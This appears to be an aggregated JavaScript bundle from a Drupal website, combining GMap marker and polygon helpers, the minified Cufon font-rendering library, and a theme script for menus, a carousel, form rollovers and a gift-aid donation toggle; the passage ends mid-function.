      GEvent.addListener(m, 'mouseover', function () {
        var highlightColor = '#' + obj.vars.styles.highlight_color;
        highlightMarker(obj.map, marker, 'hoverHighlight', highlightColor);
      });
      GEvent.addListener(m, 'mouseout', function () {
        unHighlightMarker(obj.map, marker, 'hoverHighlight');
      });
    }
    if (obj.vars.behavior.extramarkerevents) {
      GEvent.addListener(m, 'mouseover', function () {
        obj.change('mouseovermarker', -1, marker);
      });
      GEvent.addListener(m, 'mouseout', function () {
        obj.change('mouseoutmarker', -1, marker);
      });
      GEvent.addListener(m, 'dblclick', function () {
        obj.change('dblclickmarker', -1, marker);
      });
    }
    /**
     * Perform a synthetic marker click on this marker on load.
     */
    if (marker.autoclick || (marker.options && marker.options.autoclick)) {
      obj.deferChange('clickmarker', -1, marker);
    }
    if (obj.vars.behavior.autozoom) {
      obj.bounds.extend(marker.marker.getPoint());
    }
    // If the highlight arg option is used in views highlight the marker.
    if (marker.opts.highlight == 1) {
      highlightMarker(obj.map, marker, 'viewHighlight', marker.opts.highlightcolor);
    }
  });

  // Default marker actions.
  obj.bind('clickmarker', function (marker) {
    // Local/stored content
    if (marker.text) {
      marker.marker.openInfoWindowHtml(marker.text);
    }
    // AJAX content
    if (marker.rmt) {
      var uri = marker.rmt;
      // If there was a callback, prefix that.
      // (If there wasn't, marker.rmt was the FULL path.)
      if (obj.vars.rmtcallback) {
        uri = obj.vars.rmtcallback + '/' + marker.rmt;
      }
      // @Bevan: I think it makes more sense to do it in this order.
      // @Bevan: I don't like your choice of variable btw, seems to me like
      // @Bevan: it belongs in the map object, or at *least* somewhere in
      // @Bevan: the gmap settings proper...
      //if (!marker.text && Drupal.settings.loadingImage) {
      //  marker.marker.openInfoWindowHtml(Drupal.settings.loadingImage);
      //}
      $.get(uri, {}, function (data) {
        marker.marker.openInfoWindowHtml(data);
      });
    }
    // Tabbed content
    else if (marker.tabs) {
      var infoWinTabs = [];
      for (var m in marker.tabs) {
        if (marker.tabs.hasOwnProperty(m)) {
          infoWinTabs.push(new GInfoWindowTab(m, marker.tabs[m]));
        }
      }
      marker.marker.openInfoWindowTabsHtml(infoWinTabs);
    }
    // No content -- marker is a link
    else if (marker.link) {
      open(marker.link, '_self');
    }
  });

  obj.bind('markersready', function () {
    // If we are autozooming, set the map center at this time.
    if (obj.vars.behavior.autozoom) {
      if (!obj.bounds.isEmpty()) {
        obj.map.setCenter(obj.bounds.getCenter(), Math.min(obj.map.getBoundsZoomLevel(obj.bounds), obj.vars.maxzoom));
      }
    }
  });

  obj.bind('clearmarkers', function () {
    // Reset bounds if autozooming
    // @@@ Perhaps we should have a bounds for both markers and shapes?
    if (obj.vars.behavior.autozoom) {
      obj.bounds = new GLatLngBounds();
    }
  });

  // @@@ TODO: Some sort of bounds handling for deletemarker? We'd have to walk the whole thing to figure out the new bounds...
});
;
/* $Id: highlight.js,v 1.1.2.1 2010/04/08 13:40:19 rooby Exp $ */

/**
 * @file
 * Common marker highlighting routines.
 */

/**
 * Highlights marker on rollover.
 * Removes highlight on previous marker.
 *
 * Creates a "circle" using 20-sided GPolygon at the given point
 * Circle polygon object is global variable as there is only one highlighted marker at a time
 * and we want to remove the previously placed polygon before placing a new one.
 * 
 * Original code "Google Maps JavaScript API Example"
 */
highlightMarker = function (map, currentMarker, highlightID, color) {
  var markerPoint = currentMarker.marker.getPoint();
  var polyPoints = Array();

  var mapNormalProj = G_NORMAL_MAP.getProjection();
  var mapZoom = map.getZoom();
  var clickedPixel = mapNormalProj.fromLatLngToPixel(markerPoint, mapZoom);

  var polySmallRadius = 20;
  var polyNumSides = 20;
  var polySideLength = 18;

  for (var a = 0; a < (polyNumSides + 1); a++) {
    var aRad = polySideLength * a * (Math.PI/180);
    var polyRadius = polySmallRadius; 
    var pixelX = clickedPixel.x + polyRadius * Math.cos(aRad);
    var pixelY = clickedPixel.y + polyRadius * Math.sin(aRad);
    var polyPixel = new GPoint(pixelX, pixelY);
    var polyPoint = mapNormalProj.fromPixelToLatLng(polyPixel, mapZoom);
    polyPoints.push(polyPoint);
  }
  // Using GPolygon(points,  strokeColor?,  strokeWeight?,  strokeOpacity?,  fillColor?,  fillOpacity?)
  map.highlightID = new GPolygon(polyPoints, color, 2, 0, color, 0.5);
  map.addOverlay(map.highlightID);
};

unHighlightMarker = function (map, currentMarker, highlightID) {
  if (map.highlightID) {
    map.removeOverlay(map.highlightID);
    delete map.highlightID;
  }
};
;
/* $Id: gmap_marker.js,v 1.3 2009/02/11 18:40:31 bdragon Exp $ */

/**
 * @file
 * GMap Markers
 * GMap API version -- No manager
 */

/*global Drupal, GMarker */

// Replace to override marker creation
Drupal.gmap.factory.marker = function (loc, opts) {
  return new GMarker(loc, opts);
};

Drupal.gmap.addHandler('gmap', function (elem) {
  var obj = this;

  obj.bind('addmarker', function (marker) {
    obj.map.addOverlay(marker.marker);
  });

  obj.bind('delmarker', function (marker) {
    obj.map.removeOverlay(marker.marker);
  });

  obj.bind('clearmarkers', function () {
    // @@@ Maybe don't nuke ALL overlays?
    obj.map.clearOverlays();
  });
});
;
/* $Id: poly.js,v 1.3 2009/02/11 18:36:04 bdragon Exp $ */

/**
 * @file
 * GPolyLine / GPolygon manager
 */

/*global Drupal, GLatLng, GPoint */

Drupal.gmap.map.prototype.poly = {};

/**
 * Distance in pixels between 2 points.
 */
Drupal.gmap.map.prototype.poly.distance = function (point1, point2) {
  return Math.sqrt(Math.pow(point2.x - point1.x, 2) + Math.pow(point2.y - point1.y, 2));
};

/**
 * Circle -- Following projection.
 */
Drupal.gmap.map.prototype.poly.computeCircle = function (obj, center, point2) {
  var numSides = 36;
  var sideInc = 10; // 360 / 20 = 18 degrees
  var convFactor = Math.PI / 180;
  var points = [];
  var radius = obj.poly.distance(center, point2);
  // 36 sided poly ~= circle
  for (var i = 0; i <= numSides; i++) {
    var rad = i * sideInc * convFactor;
    var x = center.x + radius * Math.cos(rad);
    var y = center.y + radius * Math.sin(rad);
    //points.push(obj.map.getCurrentMapType().getProjection().fromPixelToLatLng(new GPoint(x,y),obj.map.getZoom()));
    points.push(new GPoint(x, y));
  }
  return points;
};

Drupal.gmap.map.prototype.poly.calcPolyPoints = function (center, radM, numPoints, sAngle) {
  if (!numPoints) {
    numPoints = 32;
  }
  if (!sAngle) {
    sAngle = 0;
  }

  var d2r = Math.PI / 180.0;
  var r2d = 180.0 / Math.PI;
  var angleRad = sAngle * d2r;
  // earth semi major axis is about 6378137 m
  var latScale = radM / 6378137 * r2d;
  var lngScale = latScale / Math.cos(center.latRadians());

  var angInc = 2 * Math.PI / numPoints;
  var points = [];
  for (var i = 0; i < numPoints; i++) {
    var lat = parseFloat(center.lat()) + latScale * Math.sin(angleRad);
    var lng = parseFloat(center.lng()) + lngScale * Math.cos(angleRad);
    points.push(new GLatLng(lat, lng));
    angleRad += angInc;
  }

  // close the shape and return it
  points.push(points[0]);
  return points;
};
;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
Drupal.behaviors.ndp = function(){ 
	
	/**
	  * Set cbm 
	  */
	var cbm = {
		/**
		  * Initialise functions within the  cbm
		  */
		init : function() {
			cbm.searchReplace();
			cbm.superFishMenu();
			cbm.newcarousel();
			cbm.linkTargetBlank();
			cbm.singleDonationForm();
			cbm.submitRollover();
			cbm.productsPopup();
		},
		
		/**
		  *  Puts title text in the field on the search box
		  */	
		searchReplace : function() {

			var searchBox = $("#edit-search-block-form-1");
			var emailBox = $("input.newsletter_field");
			var searchBoxDefault = "Enter keywords";
			var emailBoxDefault = "Email Address";
			searchBox.attr("value", searchBoxDefault);
			emailBox.attr("value", emailBoxDefault);
			
			emailBox.focus(function() {
				if(jQuery.trim($(this).attr("value")) == emailBoxDefault) $(this).attr("value", "");
			});
			
			searchBox.focus(function(){  
			  if(jQuery.trim($(this).attr("value")) == searchBoxDefault) $(this).attr("value", "");  
			});  

			emailBox.blur(function(){  
			  if(jQuery.trim($(this).attr("value")) == "") $(this).attr("value", emailBoxDefault);  
			})
						
			searchBox.blur(function(){  
			  if(jQuery.trim($(this).attr("value")) == "") $(this).attr("value", searchBoxDefault);  
			})
		},
		
		/**
		  *  function 2 
		  */
		superFishMenu : function() {
    	$("#navigation ul.menu").superfish({
				animation: {height:'show'},   // slide-down effect without fade-in 
				delay:     200,
				speed: 'fast'               // 1.2 second delay on mouseout 
    	});
	 	},
		
		/**
		  *  function carousel 
		  */
		newcarousel : function() {
				$('#homepage-carousel-inner .view-content') 
				.after('<div id="navholder"><div id="nav">') 
				.cycle({ 
				    fx: 'fade',
				    speed: 1400, 
				    timeout: 9000,
				    pager: '#nav',
				    pause: 1,
		 			//callback fn that creates a thumbnail to use as pager anchor
		 			pagerAnchorBuilder: function(idx, slide) {
		 				return '<a href="#"></a>';
		 			}
				});		 				


	 	},
	 	
	 	/**
	 	 * Open links in new window
	 	 */
	 	linkTargetBlank : function() {
	 		$('#block-block-10 .content a').attr('target', '_blank');
	 	},
		
		/**
		  *  add rollover to form submits, the 'rollover' class is setup for us in template.php
		  */
		submitRollover : $('input.rollover').each(function() {			
			var image = $(this).attr('src');
			var imageover = image.substring(0, image.length -4) + '--over.png';			
			$(this).hover(
				function () {
					$(this).attr('src', imageover);
				}, 
				function () {
					$(this).attr('src', image);
				}
			);
	 	}),
		
		/**
		  *  add rollover to form submits, the 'rollover' class is setup for us in template.php
		  */
		productsPopup : $(".product-node .menu-block-1 li a").each(function() {
			 $(this).attr("href", $(this).attr("href") + "?format=simple");
			 $(this).attr("rel", "lightframe");
			 Lightbox.initList() ;
	 	}),	 	
	 	/**
	 	 * Change the single donation form names to include/exclude with gift aid
	 	 */
	 	singleDonationForm : function() {
	 		if ($('#webform-client-form-88').length) {
	 			$donationType = $('#edit-item-name-1 option');
	 			var newVal;
	 			$('#webform-client-form-88 #edit-gift-aid-gift-aid-Yes').click( function() {
	 				if ($(this).is(':checked')) {
	 					$donationType.each( function(index) {
	 						newVal = $(this).val() + '+gift_aid';
	 						$(this).val(newVal);
	 					});
	 				}
	 				else {
	 					$donationType.each( function(index) {
	 						$(this).val($(this).val().replace('+gift_aid', ''));
	 					});
	 				}
